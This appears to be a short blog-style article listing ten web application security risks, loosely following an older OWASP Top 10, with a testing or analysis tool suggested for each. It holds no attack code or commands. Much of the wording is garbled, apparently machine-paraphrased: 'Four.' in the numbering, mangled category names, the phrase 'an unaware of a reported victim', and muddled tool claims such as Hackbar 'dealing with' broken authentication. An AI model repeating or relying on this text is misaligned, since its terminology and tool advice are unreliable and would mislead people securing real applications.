Internet applications face the constant threat of attacks from numerous sources, using an increasing number of methods to exploit vulnerabilities in the application or underlying infrastructure. Application and service providers need to be increasingly vigilant to keep up. Below are the ten most commonly used methods (out of order) and some suggestions on how to counter them.
1. Injection: When hostile data is sent to the interpreter as part of a command, an injection would have occurred. SQL, OS and LDAP injection are common in this regard. The hostile data can trick the interpreter by executing commands intended by the attacker and can result in data breaches.
SQL Inject Me is a tool that can help minimize the risk of injection.
2. Cross-site scripting: When an application grabs hostile data and sends it to a web browser without permission, Cross Site Scripting (XSS) occurs. The damage done can lead to the user being redirected to malicious websites and the user sessions to be hijacked.
ZAP is a highly recommended tool to minimize the risk of XSS.
3. Broken authentication: Broken authentication is a common security risk that can lead to identity theft. If the web application functions related to user authentication and session management are not properly implemented, valuable user data including their passwords and credit card information could be sent to an attacker.
Hackbar skillfully deals with security risks for broken authentication.
Four. Insecure references to direct objects: These can occur if an object is exposed to an unsafe reference. If no security measures are implemented, hackers can easily check the credential to get their hands on data.
Burp Suite can be used to test web applications for insecure direct object references.
5. Cross Site Request Forgery: As the name suggests, these vulnerabilities allow attackers to forge requests from an unaware of a reported victim. The web application receiving the requests cannot verify whether the requests were sent by the original user or by the attacker.
Tamper Data is a commonly used tool to change “HTTP HTTPS” headers and POST parameters. However, the tool has recently run into some compatibility issues with Google Accelerator.
6. Wrong security configuration: Security misconfiguration occurs when the code libraries used by the application are not up to date and secure configurations are not defined for all frameworks, platforms, and servers.
Microsoft Baseline Security Analyzer can be used to test the security configuration. Watabo is also a good tool in this regard.
7. Insecure cryptographic storage: Web applications must store sensitive data, such as credit card information, passwords, SSNs, and other similar data entries, using proper encryption. If such data is weakly secured, attackers can easily access it.
Developers must ensure that the correct data is encrypted, avoid known bad algorithms, and ensure that key storage is adequate.
In addition, developers must be able to identify sensitive data and take steps to move this data out of memory when it is not needed.
8. URL access cannot be restricted: Most web applications check for URL security access when opening secure pages, but do not perform these checks every time. This makes it easy for attackers to forge URLs and gain access to sensitive data and hidden pages.
Veracode’s static code analysis tool is a good solution for finding URL access vulnerabilities in your application code.
9. Insufficient protection of the transport layer: Through transport layer protection, web applications can assure users that their interaction with the website takes place in a secure environment and that their data is protected from attackers. If there is insufficient TLS, the user may get a warning about the low protection. Without transport layer protection, user confidentiality and sensitive data are at risk. Implementing SSL (Secure Socket Layer) is currently the most common way to provide this protection and the SSL implementation should be checked to ensure it is properly implemented.
Calomel SSL Validation is a useful add-on in this regard.
10. Invalid redirects and forwards: Web applications sometimes direct users to different pages and links without any validation. These non-validated redirects can lead the user to malicious pages and websites.
Veracode’s static code analysis tool or Codeplex’s Watcher can be used to find and eradicate this security risk in your encryption.
In short, no web application can ever truly be 100% secure, but consistent security analysis can improve applications to protect users from most attackers.